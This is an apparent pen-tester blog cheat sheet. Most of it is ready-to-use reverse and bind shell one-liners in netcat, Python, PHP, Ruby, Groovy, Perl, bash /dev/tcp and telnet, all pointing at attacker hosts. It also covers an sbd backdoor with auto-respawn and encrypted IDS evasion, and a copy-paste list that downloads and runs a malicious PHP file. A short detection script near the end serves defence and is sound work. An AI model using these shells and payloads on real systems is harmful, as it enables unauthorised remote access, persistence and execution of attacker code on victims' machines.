Linux Hackers Command Reference


Linux Command Reference for Pen-testers

This part of the blog is dedicated to Linux and Unix-like commands that can be used by Penetration Testers (yea who is your tester?) and Information Security Administrators. On this page I will periodically post tiny Linux scripts and commands that a Penetration Tester or a Security Administrator can use to:

1. Perform security administration tasks (e.g. use Windows/Linux netcat to bind shells, etc.).
2. Run vulnerability scans (e.g. identify null sessions, test for LANMAN services, etc.).
3. Do pivoting (e.g. after compromising a machine, use Windows tools to escalate, etc.).

Using Netcat to Bind Shell

Launching a listening shell in Windows and connecting to it from Linux:
  1. nc.exe -L -p <listening port> -e cmd.exe - Run in the Windows box
  2. nc <windows box ip> <windows port> - Run in the Linux/Unix-like box
Launching a listening shell in Linux/Unix-like and connecting to it from Windows:
  1. nc -l -p <listening port> -e /bin/sh - Run in the Linux/Unix-like box
  2. nc.exe <linux box ip> <linux port> - Run in the Windows box

Using Netcat to transfer files

This can be used to transfer any type of file from Linux to Windows (the Windows box listens, the Linux box sends):
  1. nc.exe -lvvp 4444 > output.txt - Run in the Windows box
  2. cat input.txt | nc -vv 192.168.8.74 4444 - Run in the Linux/Unix-like box (192.168.8.74 is the Windows box)
This can be used to transfer any type of file from Windows to Linux (the Linux box listens, the Windows box sends):
  1. nc -lvvp 4444 > output.exe - Run in the Linux box
  2. type input.exe | nc.exe -vv <linux box ip> 4444 - Run in the Windows box
Note: You might want to run the file command to identify the type of the file you want to transfer. There is no difference between transferring binary and text files (most of the time).

Using Netcat for port scanning
  1. nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from a Linux/Unix-like box
  2. nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from a Windows box
Note: The "-n" parameter prevents DNS lookups, "-z" makes nc send no data and only report whether the port accepted the connection, and "-w 1" makes connections time out after 1 second. The commands above scan ports 1 to 1000.

Using Python to get shell

This was tested under Linux / Python 2.7: 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using PHP to get shell

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Using Ruby to get shell

This one-liner connects back to 10.0.0.1 on port 1234 and attaches /bin/sh to the socket (useful when Ruby is installed on the target machine):

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Using Java to get shell

The following snippet (Groovy syntax, runnable on the JVM) connects back to 10.0.0.1 on port 2002 and pipes the received lines through bash:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


Using Perl to get shell

A short Perl reverse shell that does not depend on /bin/sh (it forks into the background, then connects to attackerip:4444):

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If the target system is running Windows (where fork is not available in the same way), use the following one-liner:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Alternatives to Bash Shell

Here are some tricks taken from Damele's blog to play with (the "<" characters were stripped by the blog software in the original; they are restored here):

    exec /bin/bash 0<&0 2>&0

Or:

    0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

Or:

    exec 5<>/dev/tcp/attackerip/4444
    cat <&5 | while read line; do $line 2>&5 >&5; done  # or:
    while read line 0<&5; do $line 2>&5 >&5; done


Using Telnet to get shell

Of course, you can also use Telnet as an alternative to Netcat, using a named pipe to join telnet's output to the shell's input:

rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/bash 1>/tmp/p

Or:

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

Note: Remember to listen on your machine on port 4445/tcp as well (the first telnet carries your input, the second carries the output).

Using sbd to get shell

An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://www.cycom.se/dl/sbd. It is described as a "Netcat clone, designed to be portable and offer strong encryption". It supports AES-128 encryption and is available on most platforms, including win32 and Linux.
  1. Listening in Windows without encryption: sbd.exe -l -p 5555 -c off
  2. Listening in Windows with encryption: sbd.exe -l -p 5555 -c on
  3. Binding a shell on a Windows machine with encryption: sbd.exe -l -p 5555 -c on -e cmd.exe
  4. Binding a shell on a Windows machine without encryption: sbd.exe -l -p 5555 -c off -e cmd.exe
  5. Connecting to Windows from Linux without encryption: sbd 192.168.11.21 5555 -c off
  6. Connecting to Windows from Linux with encryption: sbd 192.168.1.21 5555 -c on
  7. This command monitors traffic on the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
  8. This command performs port forwarding: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
  9. This command performs connection forwarding: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80
Note: The reverse shell example should prove that a decent firewall configuration in the outbound direction is necessary. In the scenario where a Trojan can be installed on a web server, it is very important to prevent that server from connecting back out of the network, which would result in a shell for the attacker.

Using sbd to transfer files
  1. For receiving a file in Windows the command is: sbd.exe -l -p 5555 > output.txt
  2. For sending a file from Linux the command is: cat input.txt | sbd 192.168.11.21 5555
Note: There is no difference between transferring an executable and a plain text file.

Using sbd to respawn the shell

Another interesting feature of sbd is the -r option, which allows you to respawn the shell. Normally, from the moment the client disconnects, the server side exits. In order to respawn the server, specify the -r <seconds> switch: the server will be listening again after the specified amount of time. This keeps the backdoor from exiting and lets the client reconnect. Specifying a time of 0 seconds respawns the server immediately.

Here is a typical interaction with sbd respawning the shell after the connection is dropped:

sbd -r 8 f -P server -l -p 100
demolisher: test1
demolisher: test2

sbd -P demolisher 127.0.0.1 100
test1
^C

sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED

sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
... after 8 seconds ....

sbd -P demolisher 127.0.0.1 100
test2     

After evaluating (or playing, in other words), the tool seems very useful and easy to use. It has (much) fewer features than netcat, although it offers built-in encryption, which can be useful to evade IDS/IPS systems; some of them will still detect malicious behaviour if it is used on well-known ports.

Useful commands for copy paste
  1. nc <attacker_ip> <port> -e /bin/bash
  2. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
  3. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
  4. mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
  5. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
  6. wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
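
Every shell on this page (the Python os.dup2 trick, the <&3 >&3 redirections in PHP and Ruby, the /dev/tcp and backpipe variants above) ends with a shell or interpreter whose stdin/stdout/stderr point at a TCP socket instead of a terminal. The following added detection script (my own example, not from the original post or from any of the tools above) walks /proc on a Linux host and flags that pattern; the SUSPECT_COMMS set and the output format are my assumptions:

```python
"""Flag processes whose stdin/stdout/stderr are attached to a socket (Linux)."""
import os
import re
from typing import Dict, List, Optional

# Shells and interpreters used by the one-liners on this page; assumption,
# tune for your own fleet (inetd-style daemons legitimately look like this).
SUSPECT_COMMS = {"sh", "bash", "dash", "python", "python2", "python3",
                 "php", "ruby", "perl", "nc", "ncat", "telnet"}
STDIO_FDS = (0, 1, 2)
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")  # readlink target of a socket fd


def stdio_on_socket(fd_targets: Dict[int, str], comm: str) -> Optional[str]:
    """Return a finding if fd 0, 1 or 2 of a suspect process is a socket.

    fd_targets maps fd number -> readlink() target of /proc/<pid>/fd/<n>.
    An interactive shell has a pty there (/dev/pts/N); a daemon has
    /dev/null. A shell whose stdio is a socket is a reverse or bind shell.
    """
    base = os.path.basename(comm)
    if base not in SUSPECT_COMMS:
        return None
    hits = [fd for fd in STDIO_FDS if SOCKET_RE.match(fd_targets.get(fd, ""))]
    if not hits:
        return None
    return f"{base}: fd {hits} attached to socket"


def scan_proc(proc_root: str = "/proc") -> List[str]:
    """Walk /proc on a live host and report suspect processes as strings."""
    findings: List[str] = []
    if not os.path.isdir(proc_root):
        return findings
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:
            with open(f"{proc_root}/{pid}/comm") as fh:
                comm = fh.read().strip()
            fd_dir = f"{proc_root}/{pid}/fd"
            targets = {int(n): os.readlink(f"{fd_dir}/{n}")
                       for n in os.listdir(fd_dir)}
        except (OSError, ValueError):
            continue  # process exited, or no permission to read its fds
        finding = stdio_on_socket(targets, comm)
        if finding:
            findings.append(f"pid {pid} {finding}")
    return findings


if __name__ == "__main__":
    for line in scan_proc():
        print(line)
```

Run it as root (or with CAP_SYS_PTRACE) so /proc/<pid>/fd of other users' processes is readable; the bash "while read line" variants only show up while a command inside the loop is running, since the loop shell itself keeps its stdio and only holds the socket on fd 5.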

References:
  1. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  2. http://en.wikipedia.org/wiki/Netcat#Port_scanning
  3. http://bernardodamele.blogspot.co.uk/2011/09/reverse-shells-one-liners.html